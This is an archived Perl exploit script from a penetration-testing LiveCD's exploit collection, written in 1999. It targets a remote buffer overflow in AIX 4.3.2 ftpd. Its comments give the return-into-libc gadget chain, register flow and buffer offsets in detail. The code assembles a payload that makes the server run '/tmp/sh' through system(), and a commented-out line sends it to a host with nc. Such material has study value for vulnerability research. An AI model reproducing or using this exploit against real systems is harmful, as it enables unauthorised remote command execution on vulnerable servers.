home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / aix / local / ftpd.pl < prev    next >
Perl Script  |  2005-02-12  |  4KB  |  155 lines
  1. #!/usr/bin/perl
  2. # *** Synnergy Networks
  3.  
  4. # * Description:
  5. #
  6. # Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an 
  7. # RS6000. (power)
  8. # This is an return into libc exploit specificly crafted for
  9. # one box and it is very unlikely to work on another box
  10.  
  11. # * Author:
  12. #
  13. # dvorak (dvorak@synnergy.net)
  14. # Synnergy Networks (c) 1999,  http://www.synnergy.net
  15.  
  16. # * Greets:
  18. # Synnergy Networks, Hit2000 crew, Emphyrio, shevek
  19.  
  20. # * Comments:
  21. #
  22. # A full working exploit will be released later on.
  23. # The addresses point to positions in the program or libraries,
  24. # only the relevant instructions are shown also note that b r0
  25. # is in fact something like mfsbr r0, bsbr or what that is in
  26. # RS6000 assembly.
  27. #
  28. # The final call is to system which needs the following arguments:
  29. # r3 = address of command to execute
  30. # r2 = TOC (what is TOC anyway), I don't know if it does matter but
  31. #      we set it anyway (we can so why not do it)
  32. # r1 = SP but this is ok already,
  33. # the rest is free so it seems.
  34. #
  35. # Our route:
  36. # 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228
  37. # 0x10015228: loads r12 with a value from our buffera
  38. #             loads r0 with the next address to jump to (0x1001038c)
  39. #             and sets r2 to another place in our buffer
  40. # 0x1001038c: sets r3 to a place in the buffer (finally!)
  41. #             sets r0 to next address to jump to (0xd00406d4, system(...))
  42. #
  43. # The flow with registers is thus:
  44. # r2 = 0x14(r1)
  45. # r12 = 0x110(r2)
  46. # r0 = 0x0(r12)
  47. # r2 = 0x4(r12)
  48. # r3 = 0x40(r1)
  49. # r12 = 0x3c(r2)
  50. # 0x14(r1) = r12 this is  the plave where TOC is stored but it doesn't seem
  51. #            to matter
  52. # r0 = 0x0(12)
  53. # r2 = 0x04(r12)
  54. # and of we go...
  55. #
  56. # We set:
  57. # $buf =  the buffer on the stack $buf[0] is the first byte in the buffer
  58. # but we will count offsets from 4 (the first 4 bytes is just "CEL " is
  59. # doesn't matter, only the space does (it makes sure the rest of the buffer)
  60. # stays the way it is and isn't converted into lower case
  61. #
  62. # Offsets:
  63. # 0x000: 0x1001038c
  64. # 0x004: buf[0]
  65. # 0x008: this is the place where the address of the systemcall is taken from
  66. #        0xd00406d4 in our case# 0x00c: thi is the address where r2 is loaded
  67. #        from just before the call to
  68. #        system(..) we set it to the TOC in our program we don't know if it
  69. #        matters and if the TOC is constant between hosts
  70. # 0x03c: buf[08]
  71. # 0x110: buf[0]
  72. # 0x204: return address (0x10010150)
  73. # 0x210: buf[0]
  74. # 0x23c: buf[0x240]
  75. # 0x240: "/tmp/sh" or whatever command you want to execute
  76. # r1 points to buf[0x1fc]
  77. #
  78. # I assume the positions in the libraries/program are fixed and that TOC
  79. # either doesn't matter or is fixed to please enlighten me on these topics.
  80. #
  81. # 0x10010150:
  82. #     l   r2, 0x14(r1)
  83. #     b   0x10015228
  84. # 0x10015228:
  85. #     l   r12, 0x110(r2)
  86. #     st  r12, 0x14(r1)
  87. #     l   r0, 0x0(r12)
  88. #     l   r2, 0x4(r12)
  89. #     b   r0
  90. # 0x1001038c:
  91. #     l   r3, 0x40(r1)
  92. #     b   0x100136f8
  93. # 0x100136f8:
  94. #     l   r12, 0x3c(r2)
  95. #     st  r12, 0x14(r1)
  96. #     l   r0,  0x0(r12)
  97. #     l   r2,  0x04(r12)
  98.  
  99. # *** Synnergy Networks
  100.  
  101. $bufstart = 0x2ff22724;   [2000]# this is our first guess
  102. $nop = "\xde\xad\xca\xfe";
  103. $buf = "CEL ";
  104. $buf .= "\x10\x01\x03\x8c";     # 0 address of second piece of
  105.                           [2000]# 'borrowed' code
  106. $buf .= pack ("N", $bufstart);  # 4
  107. $buf .= "\xd0\x04\x06\xd4";     # 8 system call..
  108. $buf .= "\xf0\x14\x63\x5c";     # c TOC
  109. $offset = 0x10;
  110. while ($offset < 0x3c) {
  111.     $offset += 4;
  112.     $buf .= $nop;
  113. }
  114. $buf .= pack ("N", $bufstart + 0x008);
  115. $offset += 4;
  116. while ($offset < 0x110) {
  117.     $offset += 4;
  118.     $buf .= $nop;
  119. }
  120. $buf .= pack ("N", $bufstart);
  121. $offset += 4;
  122. while ($offset < 0x204) {
  123.     $offset += 4;
  124.     $buf .= $nop;
  125. }
  126. $buf .= "\x10\x01\x01\x50";
  127. $offset += 4;
  128. while ($offset < 0x210) {
  129.     $offset += 4;
  130.     $buf .= $nop;
  131. }
  132. $buf .= pack ("N", $bufstart);
  133. $offset += 4;
  134. while ($offset < 0x23c) {
  135.     $offset += 4;
  136.     $buf .= $nop;
  137. }
  138. $buf .= pack ("N", $bufstart + 0x240);
  139. $offset += 4;
  140. while ($offset < 0x240) {
  141.     $offset += 4;
  142.     $buf .= $nop;
  143. }
  144. # this is the command that will be run through system
  145. $buf .= "/tmp/sh";
  146. $buf .= "\n";
  147.  
  148. # offcourse you should change this .
  149. # open F, "| nc -v -v -n 192.168.2.12 21";
  150. open F, "| od -tx1";
  151. printf F $buf;
  152. close F;
  153.  
  154. # EOF
  155. #                 www.hack.co.za           [2000]#